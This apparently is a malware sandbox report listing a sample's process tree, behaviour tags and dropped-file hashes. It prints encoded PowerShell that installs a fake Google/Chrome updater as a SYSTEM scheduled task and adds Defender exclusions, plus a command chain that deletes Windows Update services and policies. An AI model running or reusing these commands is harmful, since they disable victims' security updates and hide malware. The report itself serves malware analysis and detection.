AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAaQByACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYwBvACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMwBhAGMAMAA4ADkAYgBjAGYANgAzADkAMgA0ADMANwBjADAAMwBhAGMAYQAzADgAMABkAGUAOQBkADYAZgBhAGUAZQAwADQAOQA0ADQAOABkADMAZQA0ADkAZQBkAGMAZgA3ADIAZQA1AGIAYQA2ADAAMgA0ADkANQA4AGUAYQAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGQAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAZABzAHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAYwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbwBzAGUAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:4248 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1084 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:3376 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:4200 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:1088 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:4088 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:4224 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:4496 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:4808 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:4880 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3592 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4460 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4712 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3764 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4944 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4316 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:4588
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:4644
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:3060
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:4744
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:3204
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:4516
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:4576
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "tvtmluklrbli"3⤵PID:2244
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD5707de025f2ab727fbb3b33f4ff8b97b3
SHA151a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA2563ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
-
Filesize
1.8MB
MD5707de025f2ab727fbb3b33f4ff8b97b3
SHA151a571a425a36cbbc3103d5e9991d080ccd4abc6
SHA2563ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
SHA512256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD561098d12affb1ac0910317f24ea76401
SHA12944267cbeaf9e8fe26ab06b2f57dbb3f7ec9908
SHA2565457ef5ef375647143b2074397ec1cb803083d97225870e0436c65fe3c46cbe6
SHA5129a4f50c0a1f5ff4ca8b64cae7223a8d286926fbaea62a7137d14717a484ade3958a0b73c5ed071b771380e89df73b75c74516a621c1d131a446aefd6f4b72a9c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD517286868c0a043ae5d2ff5798b6a3163
SHA1b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA25640321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5d0bcbadb3ebcd041605f37019119c0b6
SHA136b16a2b0e025d40ec5a783cf78ad2ff7c38f288
SHA25620e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b
SHA512f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a